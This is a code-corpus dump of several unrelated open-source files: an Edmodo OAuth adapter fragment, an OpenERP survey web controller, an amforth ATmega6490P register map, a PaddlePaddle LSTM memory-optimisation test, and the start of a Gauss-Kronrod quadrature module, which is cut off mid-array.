access_token_url = 'https://api.edmodo.com/oauth/token'
authorize_url = 'https://api.edmodo.com/oauth/authorize'
profile_url = 'https://api.edmodo.com/users/me'
def complete_login(self, request, app, token, **kwargs):
resp = requests.get(self.profile_url,
params={'access_token': token.token})
extra_data = resp.json()
return self.get_provider().sociallogin_from_response(request,
extra_data)
oauth2_login = OAuth2LoginView.adapter_view(EdmodoOAuth2Adapter)
oauth2_callback = OAuth2CallbackView.adapter_view(EdmodoOAuth2Adapter)
| mit | -4,575,838,392,372,738,600 | 40.346154 | 77 | 0.615814 | false |
rvalyi/OpenUpgrade | addons/survey/controllers/main.py | 20 | 19094 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import json
import logging
import werkzeug
from datetime import datetime
from math import ceil
from openerp import SUPERUSER_ID
from openerp.addons.web import http
from openerp.addons.web.http import request
from openerp.tools.misc import DEFAULT_SERVER_DATETIME_FORMAT as DTF
from openerp.tools.safe_eval import safe_eval
_logger = logging.getLogger(__name__)
class WebsiteSurvey(http.Controller):
## HELPER METHODS ##
def _check_bad_cases(self, cr, uid, request, survey_obj, survey, user_input_obj, context=None):
# In case of bad survey, redirect to surveys list
if survey_obj.exists(cr, SUPERUSER_ID, survey.id, context=context) == []:
return werkzeug.utils.redirect("/survey/")
# In case of auth required, block public user
if survey.auth_required and uid == request.website.user_id.id:
return request.website.render("website.403")
# In case of non open surveys
if survey.stage_id.closed:
return request.website.render("survey.notopen")
# If there is no pages
if not survey.page_ids:
return request.website.render("survey.nopages")
# Everything seems to be ok
return None
def _check_deadline(self, cr, uid, user_input, context=None):
'''Prevent opening of the survey if the deadline has turned out
! This will NOT disallow access to users who have already partially filled the survey !'''
if user_input.deadline:
dt_deadline = datetime.strptime(user_input.deadline, DTF)
dt_now = datetime.now()
if dt_now > dt_deadline: # survey is not open anymore
return request.website.render("survey.notopen")
return None
## ROUTES HANDLERS ##
# Survey start
@http.route(['/survey/start/<model("survey.survey"):survey>',
'/survey/start/<model("survey.survey"):survey>/<string:token>'],
type='http', auth='public', website=True)
def start_survey(self, survey, token=None, **post):
cr, uid, context = request.cr, request.uid, request.context
survey_obj = request.registry['survey.survey']
user_input_obj = request.registry['survey.user_input']
# Test mode
if token and token == "phantom":
_logger.info("[survey] Phantom mode")
user_input_id = user_input_obj.create(cr, uid, {'survey_id': survey.id, 'test_entry': True}, context=context)
user_input = user_input_obj.browse(cr, uid, [user_input_id], context=context)[0]
data = {'survey': survey, 'page': None, 'token': user_input.token}
return request.website.render('survey.survey_init', data)
# END Test mode
# Controls if the survey can be displayed
errpage = self._check_bad_cases(cr, uid, request, survey_obj, survey, user_input_obj, context=context)
if errpage:
return errpage
# Manual surveying
if not token:
user_input_id = user_input_obj.create(cr, uid, {'survey_id': survey.id}, context=context)
user_input = user_input_obj.browse(cr, uid, [user_input_id], context=context)[0]
else:
try:
user_input_id = user_input_obj.search(cr, uid, [('token', '=', token)], context=context)[0]
except IndexError: # Invalid token
return request.website.render("website.403")
else:
user_input = user_input_obj.browse(cr, uid, [user_input_id], context=context)[0]
# Do not open expired survey
errpage = self._check_deadline(cr, uid, user_input, context=context)
if errpage:
return errpage
# Select the right page
if user_input.state == 'new': # Intro page
data = {'survey': survey, 'page': None, 'token': user_input.token}
return request.website.render('survey.survey_init', data)
else:
return request.redirect('/survey/fill/%s/%s' % (survey.id, user_input.token))
# Survey displaying
@http.route(['/survey/fill/<model("survey.survey"):survey>/<string:token>',
'/survey/fill/<model("survey.survey"):survey>/<string:token>/<string:prev>'],
type='http', auth='public', website=True)
def fill_survey(self, survey, token, prev=None, **post):
'''Display and validates a survey'''
cr, uid, context = request.cr, request.uid, request.context
survey_obj = request.registry['survey.survey']
user_input_obj = request.registry['survey.user_input']
# Controls if the survey can be displayed
errpage = self._check_bad_cases(cr, uid, request, survey_obj, survey, user_input_obj, context=context)
if errpage:
return errpage
# Load the user_input
try:
user_input_id = user_input_obj.search(cr, uid, [('token', '=', token)])[0]
except IndexError: # Invalid token
return request.website.render("website.403")
else:
user_input = user_input_obj.browse(cr, uid, [user_input_id], context=context)[0]
# Do not display expired survey (even if some pages have already been
# displayed -- There's a time for everything!)
errpage = self._check_deadline(cr, uid, user_input, context=context)
if errpage:
return errpage
# Select the right page
if user_input.state == 'new': # First page
page, page_nr, last = survey_obj.next_page(cr, uid, user_input, 0, go_back=False, context=context)
data = {'survey': survey, 'page': page, 'page_nr': page_nr, 'token': user_input.token}
if last:
data.update({'last': True})
return request.website.render('survey.survey', data)
elif user_input.state == 'done': # Display success message
return request.website.render('survey.sfinished', {'survey': survey,
'token': token,
'user_input': user_input})
elif user_input.state == 'skip':
flag = (True if prev and prev == 'prev' else False)
page, page_nr, last = survey_obj.next_page(cr, uid, user_input, user_input.last_displayed_page_id.id, go_back=flag, context=context)
data = {'survey': survey, 'page': page, 'page_nr': page_nr, 'token': user_input.token}
if last:
data.update({'last': True})
return request.website.render('survey.survey', data)
else:
return request.website.render("website.403")
# AJAX prefilling of a survey
@http.route(['/survey/prefill/<model("survey.survey"):survey>/<string:token>',
'/survey/prefill/<model("survey.survey"):survey>/<string:token>/<model("survey.page"):page>'],
type='http', auth='public', website=True)
def prefill(self, survey, token, page=None, **post):
cr, uid, context = request.cr, request.uid, request.context
user_input_line_obj = request.registry['survey.user_input_line']
ret = {}
# Fetch previous answers
if page:
ids = user_input_line_obj.search(cr, uid, [('user_input_id.token', '=', token), ('page_id', '=', page.id)], context=context)
else:
ids = user_input_line_obj.search(cr, uid, [('user_input_id.token', '=', token)], context=context)
previous_answers = user_input_line_obj.browse(cr, uid, ids, context=context)
# Return non empty answers in a JSON compatible format
for answer in previous_answers:
if not answer.skipped:
answer_tag = '%s_%s_%s' % (answer.survey_id.id, answer.page_id.id, answer.question_id.id)
answer_value = None
if answer.answer_type == 'free_text':
answer_value = answer.value_free_text
elif answer.answer_type == 'text' and answer.question_id.type == 'textbox':
answer_value = answer.value_text
elif answer.answer_type == 'text' and answer.question_id.type != 'textbox':
# here come comment answers for matrices, simple choice and multiple choice
answer_tag = "%s_%s" % (answer_tag, 'comment')
answer_value = answer.value_text
elif answer.answer_type == 'number':
answer_value = answer.value_number.__str__()
elif answer.answer_type == 'date':
answer_value = answer.value_date
elif answer.answer_type == 'suggestion' and not answer.value_suggested_row:
answer_value = answer.value_suggested.id
elif answer.answer_type == 'suggestion' and answer.value_suggested_row:
answer_tag = "%s_%s" % (answer_tag, answer.value_suggested_row.id)
answer_value = answer.value_suggested.id
if answer_value:
dict_soft_update(ret, answer_tag, answer_value)
else:
_logger.warning("[survey] No answer has been found for question %s marked as non skipped" % answer_tag)
return json.dumps(ret)
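    # The returned JSON maps answer tags to lists of values, e.g. (sketch)
    #     {"1_2_5": [3], "1_2_6_comment": ["free text"]}
    # following the '<survey>_<page>_<question>[_suffix]' scheme built above.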
# AJAX scores loading for quiz correction mode
@http.route(['/survey/scores/<model("survey.survey"):survey>/<string:token>'],
type='http', auth='public', website=True)
def get_scores(self, survey, token, page=None, **post):
cr, uid, context = request.cr, request.uid, request.context
user_input_line_obj = request.registry['survey.user_input_line']
ret = {}
# Fetch answers
ids = user_input_line_obj.search(cr, uid, [('user_input_id.token', '=', token)], context=context)
previous_answers = user_input_line_obj.browse(cr, uid, ids, context=context)
# Compute score for each question
for answer in previous_answers:
tmp_score = ret.get(answer.question_id.id, 0.0)
ret.update({answer.question_id.id: tmp_score + answer.quizz_mark})
return json.dumps(ret)
# AJAX submission of a page
@http.route(['/survey/submit/<model("survey.survey"):survey>'],
type='http', methods=['POST'], auth='public', website=True)
def submit(self, survey, **post):
_logger.debug('Incoming data: %s', post)
page_id = int(post['page_id'])
cr, uid, context = request.cr, request.uid, request.context
survey_obj = request.registry['survey.survey']
questions_obj = request.registry['survey.question']
questions_ids = questions_obj.search(cr, uid, [('page_id', '=', page_id)], context=context)
questions = questions_obj.browse(cr, uid, questions_ids, context=context)
# Answer validation
errors = {}
for question in questions:
answer_tag = "%s_%s_%s" % (survey.id, page_id, question.id)
errors.update(questions_obj.validate_question(cr, uid, question, post, answer_tag, context=context))
ret = {}
if (len(errors) != 0):
# Return errors messages to webpage
ret['errors'] = errors
else:
# Store answers into database
user_input_obj = request.registry['survey.user_input']
user_input_line_obj = request.registry['survey.user_input_line']
try:
user_input_id = user_input_obj.search(cr, uid, [('token', '=', post['token'])], context=context)[0]
except KeyError: # Invalid token
return request.website.render("website.403")
for question in questions:
answer_tag = "%s_%s_%s" % (survey.id, page_id, question.id)
user_input_line_obj.save_lines(cr, uid, user_input_id, question, post, answer_tag, context=context)
user_input = user_input_obj.browse(cr, uid, user_input_id, context=context)
go_back = post['button_submit'] == 'previous'
next_page, _, last = survey_obj.next_page(cr, uid, user_input, page_id, go_back=go_back, context=context)
vals = {'last_displayed_page_id': page_id}
if next_page is None and not go_back:
vals.update({'state': 'done'})
else:
vals.update({'state': 'skip'})
user_input_obj.write(cr, uid, user_input_id, vals, context=context)
ret['redirect'] = '/survey/fill/%s/%s' % (survey.id, post['token'])
if go_back:
ret['redirect'] += '/prev'
return json.dumps(ret)
# Printing routes
@http.route(['/survey/print/<model("survey.survey"):survey>',
'/survey/print/<model("survey.survey"):survey>/<string:token>'],
type='http', auth='public', website=True)
def print_survey(self, survey, token=None, **post):
'''Display an survey in printable view; if <token> is set, it will
grab the answers of the user_input_id that has <token>.'''
return request.website.render('survey.survey_print',
{'survey': survey,
'token': token,
'page_nr': 0,
'quizz_correction': True if survey.quizz_mode and token else False})
@http.route(['/survey/results/<model("survey.survey"):survey>'],
type='http', auth='user', website=True)
def survey_reporting(self, survey, token=None, **post):
'''Display survey Results & Statistics for given survey.'''
result_template, current_filters, filter_display_data, filter_finish = 'survey.result', [], [], False
survey_obj = request.registry['survey.survey']
if not survey.user_input_ids or not [input_id.id for input_id in survey.user_input_ids if input_id.state != 'new']:
result_template = 'survey.no_result'
if 'finished' in post:
post.pop('finished')
filter_finish = True
if post or filter_finish:
filter_data = self.get_filter_data(post)
current_filters = survey_obj.filter_input_ids(request.cr, request.uid, filter_data, filter_finish, context=request.context)
filter_display_data = survey_obj.get_filter_display_data(request.cr, request.uid, filter_data, context=request.context)
return request.website.render(result_template,
{'survey': survey,
'survey_dict': self.prepare_result_dict(survey, current_filters),
'page_range': self.page_range,
'current_filters': current_filters,
'filter_display_data': filter_display_data,
'filter_finish': filter_finish
})
def prepare_result_dict(self,survey, current_filters=[]):
"""Returns dictionary having values for rendering template"""
survey_obj = request.registry['survey.survey']
result = {'survey':survey, 'page_ids': []}
for page in survey.page_ids:
page_dict = {'page': page, 'question_ids': []}
for question in page.question_ids:
                question_dict = {
                    'question': question,
                    'input_summary': survey_obj.get_input_summary(
                        request.cr, request.uid, question, current_filters,
                        context=request.context),
                    'prepare_result': survey_obj.prepare_result(
                        request.cr, request.uid, question, current_filters,
                        context=request.context),
                    'graph_data': self.get_graph_data(question, current_filters)}
page_dict['question_ids'].append(question_dict)
result['page_ids'].append(page_dict)
return result
def get_filter_data(self, post):
"""Returns data used for filtering the result"""
filters = []
for ids in post:
            # if the user added random data to the query URI, ignore it
try:
row_id, answer_id = ids.split(',')
filters.append({'row_id': int(row_id), 'answer_id': int(answer_id)})
except:
return filters
return filters
def page_range(self, total_record, limit):
'''Returns number of pages required for pagination'''
total = ceil(total_record / float(limit))
return range(1, int(total + 1))
def get_graph_data(self, question, current_filters=[]):
'''Returns formatted data required by graph library on basis of filter'''
survey_obj = request.registry['survey.survey']
result = []
if question.type == 'multiple_choice':
result.append({'key': str(question.question),
'values': survey_obj.prepare_result(request.cr, request.uid, question, current_filters, context=request.context)})
if question.type == 'simple_choice':
result = survey_obj.prepare_result(request.cr, request.uid, question, current_filters, context=request.context)
if question.type == 'matrix':
data = survey_obj.prepare_result(request.cr, request.uid, question, current_filters, context=request.context)
for answer in data['answers']:
values = []
for res in data['result']:
if res[1] == answer:
values.append({'text': data['rows'][res[0]], 'count': data['result'][res]})
result.append({'key': data['answers'].get(answer), 'values': values})
return json.dumps(result)
def dict_soft_update(dictionary, key, value):
''' Insert the pair <key>: <value> into the <dictionary>. If <key> is
already present, this function will append <value> to the list of
existing data (instead of erasing it) '''
if key in dictionary:
dictionary[key].append(value)
else:
dictionary.update({key: [value]})
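# e.g. (sketch):
#     d = {}
#     dict_soft_update(d, 'q1', 'a')
#     dict_soft_update(d, 'q1', 'b')
#     # d == {'q1': ['a', 'b']}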
| agpl-3.0 | 395,027,819,287,855,700 | 49.781915 | 359 | 0.585786 | false |
andrewtholt/My-amforth-6.1 | avr8/devices/atmega6490p/device.py | 5 | 6779 | # Partname: ATmega6490P
# generated automatically, do not edit
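# Usage sketch: names map to amforth address/bitmask literals, e.g.
# MCUREGS['PORTB'] == '&37' (an I/O register address) and
# MCUREGS['SPCR_SPE'] == '$40' (a bit mask within SPCR).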
MCUREGS = {
'ADMUX': '&124',
'ADMUX_REFS': '$C0',
'ADMUX_ADLAR': '$20',
'ADMUX_MUX': '$1F',
'ADCSRA': '&122',
'ADCSRA_ADEN': '$80',
'ADCSRA_ADSC': '$40',
'ADCSRA_ADATE': '$20',
'ADCSRA_ADIF': '$10',
'ADCSRA_ADIE': '$08',
'ADCSRA_ADPS': '$07',
'ADC': '&120',
'ADCSRB': '&123',
'ADCSRB_ADTS': '$07',
'DIDR0': '&126',
'DIDR0_ADC7D': '$80',
'DIDR0_ADC6D': '$40',
'DIDR0_ADC5D': '$20',
'DIDR0_ADC4D': '$10',
'DIDR0_ADC3D': '$08',
'DIDR0_ADC2D': '$04',
'DIDR0_ADC1D': '$02',
'DIDR0_ADC0D': '$01',
'ACSR': '&80',
'ACSR_ACD': '$80',
'ACSR_ACBG': '$40',
'ACSR_ACO': '$20',
'ACSR_ACI': '$10',
'ACSR_ACIE': '$08',
'ACSR_ACIC': '$04',
'ACSR_ACIS': '$03',
'DIDR1': '&127',
'DIDR1_AIN1D': '$02',
'DIDR1_AIN0D': '$01',
'SPCR': '&76',
'SPCR_SPIE': '$80',
'SPCR_SPE': '$40',
'SPCR_DORD': '$20',
'SPCR_MSTR': '$10',
'SPCR_CPOL': '$08',
'SPCR_CPHA': '$04',
'SPCR_SPR': '$03',
'SPSR': '&77',
'SPSR_SPIF': '$80',
'SPSR_WCOL': '$40',
'SPSR_SPI2X': '$01',
'SPDR': '&78',
'USIDR': '&186',
'USISR': '&185',
'USISR_USISIF': '$80',
'USISR_USIOIF': '$40',
'USISR_USIPF': '$20',
'USISR_USIDC': '$10',
'USISR_USICNT': '$0F',
'USICR': '&184',
'USICR_USISIE': '$80',
'USICR_USIOIE': '$40',
'USICR_USIWM': '$30',
'USICR_USICS': '$0C',
'USICR_USICLK': '$02',
'USICR_USITC': '$01',
'UDR0': '&198',
'UCSR0A': '&192',
'UCSR0A_RXC0': '$80',
'UCSR0A_TXC0': '$40',
'UCSR0A_UDRE0': '$20',
'UCSR0A_FE0': '$10',
'UCSR0A_DOR0': '$08',
'UCSR0A_UPE0': '$04',
'UCSR0A_U2X0': '$02',
'UCSR0A_MPCM0': '$01',
'UCSR0B': '&193',
'UCSR0B_RXCIE0': '$80',
'UCSR0B_TXCIE0': '$40',
'UCSR0B_UDRIE0': '$20',
'UCSR0B_RXEN0': '$10',
'UCSR0B_TXEN0': '$08',
'UCSR0B_UCSZ02': '$04',
'UCSR0B_RXB80': '$02',
'UCSR0B_TXB80': '$01',
'UCSR0C': '&194',
'UCSR0C_UMSEL0': '$40',
'UCSR0C_UPM0': '$30',
'UCSR0C_USBS0': '$08',
'UCSR0C_UCSZ0': '$06',
'UCSR0C_UCPOL0': '$01',
'UBRR0': '&196',
'SREG': '&95',
'SREG_I': '$80',
'SREG_T': '$40',
'SREG_H': '$20',
'SREG_S': '$10',
'SREG_V': '$08',
'SREG_N': '$04',
'SREG_Z': '$02',
'SREG_C': '$01',
'SP': '&93',
'MCUCR': '&85',
'MCUCR_PUD': '$10',
'MCUCR_IVSEL': '$02',
'MCUCR_IVCE': '$01',
'MCUSR': '&84',
'MCUSR_JTRF': '$10',
'MCUSR_WDRF': '$08',
'MCUSR_BORF': '$04',
'MCUSR_EXTRF': '$02',
'MCUSR_PORF': '$01',
'OSCCAL': '&102',
'CLKPR': '&97',
'CLKPR_CLKPCE': '$80',
'CLKPR_CLKPS': '$0F',
'PRR': '&100',
'PRR_PRLCD': '$10',
'PRR_PRTIM1': '$08',
'PRR_PRSPI': '$04',
'PRR_PRUSART0': '$02',
'PRR_PRADC': '$01',
'SMCR': '&83',
'SMCR_SM': '$0E',
'SMCR_SE': '$01',
'GPIOR2': '&75',
'GPIOR1': '&74',
'GPIOR0': '&62',
'OCDR': '&81',
'EEAR': '&65',
'EEDR': '&64',
'EECR': '&63',
'EECR_EERIE': '$08',
'EECR_EEMWE': '$04',
'EECR_EEWE': '$02',
'EECR_EERE': '$01',
'PORTA': '&34',
'DDRA': '&33',
'PINA': '&32',
'PORTB': '&37',
'DDRB': '&36',
'PINB': '&35',
'PORTC': '&40',
'DDRC': '&39',
'PINC': '&38',
'PORTD': '&43',
'DDRD': '&42',
'PIND': '&41',
'PORTE': '&46',
'DDRE': '&45',
'PINE': '&44',
'PORTF': '&49',
'DDRF': '&48',
'PINF': '&47',
'PORTG': '&52',
'DDRG': '&51',
'PING': '&50',
'TCCR0A': '&68',
'TCCR0A_FOC0A': '$80',
'TCCR0A_WGM00': '$40',
'TCCR0A_COM0A': '$30',
'TCCR0A_WGM01': '$08',
'TCCR0A_CS0': '$07',
'TCNT0': '&70',
'OCR0A': '&71',
'TIMSK0': '&110',
'TIMSK0_OCIE0A': '$02',
'TIMSK0_TOIE0': '$01',
'TIFR0': '&53',
'TIFR0_OCF0A': '$02',
'TIFR0_TOV0': '$01',
'GTCCR': '&67',
'GTCCR_TSM': '$80',
'GTCCR_PSR310': '$01',
'TCCR1A': '&128',
'TCCR1A_COM1A': '$C0',
'TCCR1A_COM1B': '$30',
'TCCR1A_WGM1': '$03',
'TCCR1B': '&129',
'TCCR1B_ICNC1': '$80',
'TCCR1B_ICES1': '$40',
'TCCR1B_WGM1': '$18',
'TCCR1B_CS1': '$07',
'TCCR1C': '&130',
'TCCR1C_FOC1A': '$80',
'TCCR1C_FOC1B': '$40',
'TCNT1': '&132',
'OCR1A': '&136',
'OCR1B': '&138',
'ICR1': '&134',
'TIMSK1': '&111',
'TIMSK1_ICIE1': '$20',
'TIMSK1_OCIE1B': '$04',
'TIMSK1_OCIE1A': '$02',
'TIMSK1_TOIE1': '$01',
'TIFR1': '&54',
'TIFR1_ICF1': '$20',
'TIFR1_OCF1B': '$04',
'TIFR1_OCF1A': '$02',
'TIFR1_TOV1': '$01',
'TCCR2A': '&176',
'TCCR2A_FOC2A': '$80',
'TCCR2A_WGM20': '$40',
'TCCR2A_COM2A': '$30',
'TCCR2A_WGM21': '$08',
'TCCR2A_CS2': '$07',
'TCNT2': '&178',
'OCR2A': '&179',
'TIMSK2': '&112',
'TIMSK2_OCIE2A': '$02',
'TIMSK2_TOIE2': '$01',
'TIFR2': '&55',
'TIFR2_OCF2A': '$02',
'TIFR2_TOV2': '$01',
'ASSR': '&182',
'ASSR_EXCLK': '$10',
'ASSR_AS2': '$08',
'ASSR_TCN2UB': '$04',
'ASSR_OCR2UB': '$02',
'ASSR_TCR2UB': '$01',
'WDTCR': '&96',
'WDTCR_WDCE': '$10',
'WDTCR_WDE': '$08',
'WDTCR_WDP': '$07',
'SPMCSR': '&87',
'SPMCSR_SPMIE': '$80',
'SPMCSR_RWWSB': '$40',
'SPMCSR_RWWSRE': '$10',
'SPMCSR_BLBSET': '$08',
'SPMCSR_PGWRT': '$04',
'SPMCSR_PGERS': '$02',
'SPMCSR_SPMEN': '$01',
'PORTH': '&218',
'DDRH': '&217',
'PINH': '&216',
'PORTJ': '&221',
'DDRJ': '&220',
'PINJ': '&219',
'LCDDR19': '&255',
'LCDDR18': '&254',
'LCDDR17': '&253',
'LCDDR16': '&252',
'LCDDR15': '&251',
'LCDDR14': '&250',
'LCDDR13': '&249',
'LCDDR12': '&248',
'LCDDR11': '&247',
'LCDDR10': '&246',
'LCDDR9': '&245',
'LCDDR8': '&244',
'LCDDR7': '&243',
'LCDDR6': '&242',
'LCDDR5': '&241',
'LCDDR4': '&240',
'LCDDR3': '&239',
'LCDDR2': '&238',
'LCDDR1': '&237',
'LCDDR0': '&236',
'LCDCCR': '&231',
'LCDFRR': '&230',
'LCDFRR_LCDPS': '$70',
'LCDFRR_LCDCD': '$07',
'LCDCRB': '&229',
'LCDCRB_LCDCS': '$80',
'LCDCRB_LCD2B': '$40',
'LCDCRB_LCDMUX': '$30',
'LCDCRB_LCDPM': '$0F',
'LCDCRA': '&228',
'LCDCRA_LCDEN': '$80',
'LCDCRA_LCDAB': '$40',
'LCDCRA_LCDIF': '$10',
'LCDCRA_LCDIE': '$08',
'LCDCRA_LCDBL': '$01',
'EICRA': '&105',
'EICRA_ISC01': '$02',
'EICRA_ISC00': '$01',
'EIMSK': '&61',
'EIMSK_PCIE': '$F0',
'EIMSK_INT0': '$01',
'EIFR': '&60',
'EIFR_PCIF': '$F0',
'EIFR_INTF0': '$01',
'PCMSK3': '&115',
'PCMSK2': '&109',
'PCMSK1': '&108',
'PCMSK0': '&107',
'INT0Addr': '2',
'PCINT0Addr': '4',
'PCINT1Addr': '6',
'TIMER2_COMPAddr': '8',
'TIMER2_OVFAddr': '10',
'TIMER1_CAPTAddr': '12',
'TIMER1_COMPAAddr': '14',
'TIMER1_COMPBAddr': '16',
'TIMER1_OVFAddr': '18',
'TIMER0_COMPAddr': '20',
'TIMER0_OVFAddr': '22',
'SPI__STCAddr': '24',
'USART__RXAddr': '26',
'USART__UDREAddr': '28',
'USART0__TXAddr': '30',
'USI_STARTAddr': '32',
'USI_OVERFLOWAddr': '34',
'ANALOG_COMPAddr': '36',
'ADCAddr': '38',
'EE_READYAddr': '40',
'SPM_READYAddr': '42',
'LCDAddr': '44',
'PCINT2Addr': '46',
'PCINT3Addr': '48'
} | gpl-3.0 | -9,155,134,705,224,719,000 | 20.941748 | 38 | 0.473816 | false |
baidu/Paddle | python/paddle/fluid/tests/unittests/test_ir_memory_optimize_nlp.py | 5 | 1878 | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# nlp model stack of op operate on lod. It's a classical test case in optimize pass.
from __future__ import print_function
import paddle.fluid as fluid
import unittest
from ir_memory_optimize_net_base import TestIrMemOptBase
def lstm_net(data,
label,
dict_dim,
emb_dim=128,
hid_dim=128,
hid_dim2=96,
class_dim=2,
emb_lr=30.0):
emb = fluid.layers.embedding(
input=data,
size=[dict_dim, emb_dim],
param_attr=fluid.ParamAttr(learning_rate=emb_lr))
fc0 = fluid.layers.fc(input=emb, size=hid_dim * 4)
lstm_h, c = fluid.layers.dynamic_lstm(
input=fc0, size=hid_dim * 4, is_reverse=False)
lstm_max = fluid.layers.sequence_pool(input=lstm_h, pool_type='max')
lstm_max_tanh = fluid.layers.tanh(lstm_max)
fc1 = fluid.layers.fc(input=lstm_max_tanh, size=hid_dim2, act='tanh')
prediction = fluid.layers.fc(input=fc1, size=class_dim, act='softmax')
cost = fluid.layers.cross_entropy(input=prediction, label=label)
avg_cost = fluid.layers.mean(x=cost)
return avg_cost
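# Wiring sketch (hypothetical names and a placeholder vocabulary size):
#
#     data = fluid.layers.data(name='words', shape=[1], dtype='int64',
#                              lod_level=1)
#     label = fluid.layers.data(name='label', shape=[1], dtype='int64')
#     avg_cost = lstm_net(data, label, dict_dim=5147)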
class TestIrMemOptRNN(TestIrMemOptBase):
def setUp(self):
self.network = lstm_net
if __name__ == "__main__":
unittest.main()
| apache-2.0 | -2,888,267,745,529,861,600 | 33.145455 | 84 | 0.675186 | false |
rtrwalker/geotecha | geotecha/mathematics/quadrature.py | 1 | 74253 | # geotecha - A software suite for geotechncial engineering
# Copyright (C) 2018 Rohan T. Walker ([email protected])
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/gpl.html.
"""Numerical integration by quadrature"""
from __future__ import division, print_function
import matplotlib.pyplot
import numpy as np
from scipy import integrate
from scipy.special import jn_zeros
from scipy.special import jn
from matplotlib import pyplot as plt
import functools
import unittest
from numpy.testing import assert_allclose
from numpy.polynomial.polynomial import Polynomial
def gauss_kronrod_abscissae_and_weights(n):
"""Gauss-Kronrod quadrature abscissae and weights
Coarse integral = Sum(f(xi) * wi1)
Fine integral = Sum(f(xi) * wi2)
For the coarse integral the unused weights are set to zero
Parameters
----------
    n : int
        Number of Gauss integration points; must be one of 7, 10, 15, 20,
        25 or 30. The number of Kronrod points will automatically be
        2 * n + 1.
Returns
-------
xi : 1d array
Abscissae for the quadrature points.
wi1 : 1d array
Weights for the coarse integral.
wi2 : 1d array
Weights for the fine integral
References
----------
    .. [2] Holoborodko, Pavel. 2011. 'Gauss-Kronrod Quadrature Nodes and
        Weights'. November 7.
http://www.advanpix.com/2011/11/07/gauss-kronrod-quadrature-nodes-weights/#Tabulated_Gauss-Kronrod_weights_and_abscissae
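    Examples
    --------
    Sketch: estimate the integral of exp(x) over [-1, 1] using the
    7-point Gauss / 15-point Kronrod pair (zero-padded coarse weights
    let both sums run over the same abscissae):
    >>> xi, wi1, wi2 = gauss_kronrod_abscissae_and_weights(7)
    >>> coarse = np.sum(np.exp(xi) * wi1)
    >>> fine = np.sum(np.exp(xi) * wi2)
    >>> np.allclose([coarse, fine], np.exp(1) - np.exp(-1))
    True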
"""
    if n not in [7, 10, 15, 20, 25, 30]:
        raise ValueError('n must be one of 7, 10, 15, 20, 25, 30')
weights = {
7: {
'g': np.array(
[[-0.9491079123427585245261897, 0.1294849661688696932706114],
[ -0.7415311855993944398638648, 0.2797053914892766679014678],
[ -0.4058451513773971669066064, 0.3818300505051189449503698],
[ 0.0000000000000000000000000, 0.4179591836734693877551020],
[ 0.4058451513773971669066064, 0.3818300505051189449503698],
[ 0.7415311855993944398638648, 0.2797053914892766679014678],
[ 0.9491079123427585245261897, 0.1294849661688696932706114]],
dtype=float),
'k': np.array(
[[-0.9914553711208126392068547, 0.0229353220105292249637320],
[ -0.9491079123427585245261897, 0.0630920926299785532907007],
[ -0.8648644233597690727897128, 0.1047900103222501838398763],
[ -0.7415311855993944398638648, 0.1406532597155259187451896],
[ -0.5860872354676911302941448, 0.1690047266392679028265834],
[ -0.4058451513773971669066064, 0.1903505780647854099132564],
[ -0.2077849550078984676006894, 0.2044329400752988924141620],
[ 0.0000000000000000000000000, 0.2094821410847278280129992],
[ 0.2077849550078984676006894, 0.2044329400752988924141620],
[ 0.4058451513773971669066064, 0.1903505780647854099132564],
[ 0.5860872354676911302941448, 0.1690047266392679028265834],
[ 0.7415311855993944398638648, 0.1406532597155259187451896],
[ 0.8648644233597690727897128, 0.1047900103222501838398763],
[ 0.9491079123427585245261897, 0.0630920926299785532907007],
[ 0.9914553711208126392068547, 0.0229353220105292249637320]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False], dtype=bool)
},
10: {
'g': np.array(
[[-0.9739065285171717200779640, 0.0666713443086881375935688],
[ -0.8650633666889845107320967, 0.1494513491505805931457763],
[ -0.6794095682990244062343274, 0.2190863625159820439955349],
[ -0.4333953941292471907992659, 0.2692667193099963550912269],
[ -0.1488743389816312108848260, 0.2955242247147528701738930],
[ 0.1488743389816312108848260, 0.2955242247147528701738930],
[ 0.4333953941292471907992659, 0.2692667193099963550912269],
[ 0.6794095682990244062343274, 0.2190863625159820439955349],
[ 0.8650633666889845107320967, 0.1494513491505805931457763],
[ 0.9739065285171717200779640, 0.0666713443086881375935688]],
dtype=float),
'k': np.array(
[[-0.9956571630258080807355273, 0.0116946388673718742780644],
[ -0.9739065285171717200779640, 0.0325581623079647274788190],
[ -0.9301574913557082260012072, 0.0547558965743519960313813],
[ -0.8650633666889845107320967, 0.0750396748109199527670431],
[ -0.7808177265864168970637176, 0.0931254545836976055350655],
[ -0.6794095682990244062343274, 0.1093871588022976418992106],
[ -0.5627571346686046833390001, 0.1234919762620658510779581],
[ -0.4333953941292471907992659, 0.1347092173114733259280540],
[ -0.2943928627014601981311266, 0.1427759385770600807970943],
[ -0.1488743389816312108848260, 0.1477391049013384913748415],
[ 0.0000000000000000000000000, 0.1494455540029169056649365],
[ 0.1488743389816312108848260, 0.1477391049013384913748415],
[ 0.2943928627014601981311266, 0.1427759385770600807970943],
